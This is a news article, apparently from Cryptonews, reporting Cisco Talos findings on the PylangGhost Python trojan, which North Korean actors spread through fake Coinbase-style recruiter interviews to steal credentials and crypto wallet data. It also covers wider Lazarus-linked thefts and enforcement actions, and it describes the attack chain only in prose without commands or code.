North Korean Cybercriminals Impersonate Coinbase Recruiters to Acquire Cryptocurrency Using ‘PylangGhost’ Trojan

North Korean cybercriminals have intensified their focus on cryptocurrency professionals with an advanced new Python-based malware known as PylangGhost.

They utilize intricate fake job interview schemes that impersonate prominent companies, such as Coinbase, Robinhood, and Uniswap, to extract credentials from more than 80 browser extensions and cryptocurrency wallets.

Researchers from Cisco Talos uncovered this recent operation by the notorious “Famous Chollima” threat group.

The attacks mainly target crypto and blockchain experts in India. Victims are enticed through deceptive skill-testing websites that seem legitimate but ultimately deceive users into executing harmful commands disguised as video driver installations for fictitious interview recordings.

Source: Talos Intelligence

The PylangGhost initiative marks the latest intensification in North Korea’s systematic assault on the cryptocurrency sector, which has resulted in over $1.3 billion in stolen assets across 47 distinct incidents in 2024 alone, according to Chainalysis data.

PylangGhost Trojan: From Fake Interviews to Full System Compromise

The PylangGhost operation employs advanced social engineering strategies, starting with meticulously crafted fake recruiter outreach that targets specific skills in cryptocurrency and blockchain technologies.

Victims receive invitations to skill-testing websites developed using the React framework that closely resemble authentic company assessment platforms.

These sites feature technical questions aimed at validating the target’s professional credentials and creating a realistic interview atmosphere.

The psychological manipulation peaks when candidates complete assessments and are prompted to record video interviews. The site requests camera access through a seemingly harmless button click.

Source: Talos Intelligence

Once camera access is requested, the site presents platform-specific instructions for downloading purported video drivers. Various command shells are provided based on browser fingerprinting, including PowerShell or Command Shell for Windows users and Bash for macOS systems.

Source: Talos Intelligence

The malicious command downloads a ZIP file containing the PylangGhost modules and a Visual Basic Script that extracts a Python library. It subsequently activates the Trojan through a renamed Python interpreter, using “nvidia.py” as the execution file.

The malware’s functionalities extend well beyond mere credential theft. It establishes persistent access through registry alterations that ensure the RAT launches each time the user logs into the system.

PylangGhost generates unique system GUIDs for communication with command-and-control servers while employing advanced data exfiltration capabilities targeting over 80 browser extensions, including essential cryptocurrency wallets such as Metamask, Phantom, Bitski, TronLink, and MultiverseX.

The Trojan’s modular architecture allows for remote file upload and download, OS shell access, and extensive browser data collection, including stored credentials, session cookies, and extension data from password managers like 1Password and NordPass.

A Global Campaign Threatening Crypto Industry Security

The discovery of PylangGhost is merely the visible segment of a vast, coordinated North Korean cyber campaign that has fundamentally jeopardized crypto enterprises and professionals globally.

Intelligence agencies from Japan, South Korea, and the United States have documented how North Korean-backed groups, chiefly the infamous Lazarus collective, orchestrated sophisticated operations that led to the theft of at least $659 million through cryptocurrency heists in 2024 alone.

North Korean cyber spies reportedly established fake US firms to deploy malware targeting crypto developers, violating Treasury sanctions.#NorthKorea #CyberSecurity https://t.co/TvCmrspaep

— Cryptonews.com (@cryptonews) April 25, 2025

Recent enforcement actions have unveiled the true extent of North Korean cyber operations. The FBI has seized the domain of BlockNovas LLC, which was utilized to create seemingly legitimate corporate entities and conduct long-term deception campaigns.

The recent $50 million Radiant Capital hack also illustrated the effectiveness of these strategies when North Korean operatives successfully impersonated former contractors and distributed malware-laden PDFs to engineers.

A North Korean hacker posed as a job seeker for an engineering position at Kraken, attempting to infiltrate the exchange’s ranks.#Kraken #CryptoHacker #NorthKoreanHackerhttps://t.co/IorY67EV3L

— Cryptonews.com (@cryptonews) May 2, 2025

In contrast, while these tactics remain effective, Kraken’s recent announcement of successfully identifying and preventing a North Korean job applicant indicates that major exchanges are now adopting enhanced screening measures to detect infiltration attempts.

Similarly, BitMEX recently executed a counterintelligence operation that revealed significant operational vulnerabilities within the Lazarus Group. This included exposed IP addresses and accessible databases that disclosed the group’s fragmented structure with varying technical capabilities across different cells.

The international response has significantly intensified, with South Korea and the European Union formalizing cybersecurity cooperation agreements specifically aimed at North Korean cryptocurrency operations.

Concurrently, U.S. authorities have broadened forfeiture actions to recover over $7.7 million in crypto assets obtained through networks of covert IT workers.

Japan is preparing to urge G7 nations to initiate a coordinated response against North Korea’s increasing involvement in cryptocurrency theft.#Japan #NorthKoreahttps://t.co/0WG78wEsx4

— Cryptonews.com (@cryptonews) June 12, 2025

The escalating threat has sparked discussions at the highest levels of international diplomacy, with G7 leaders anticipated to address North Korea’s rising cyberattacks at forthcoming summits as member states seek coordinated strategies to safeguard global financial infrastructure.

The post North Korean Hackers Pose as Coinbase Recruiters to Steal Crypto with ‘PylangGhost’ Trojan appeared first on Cryptonews.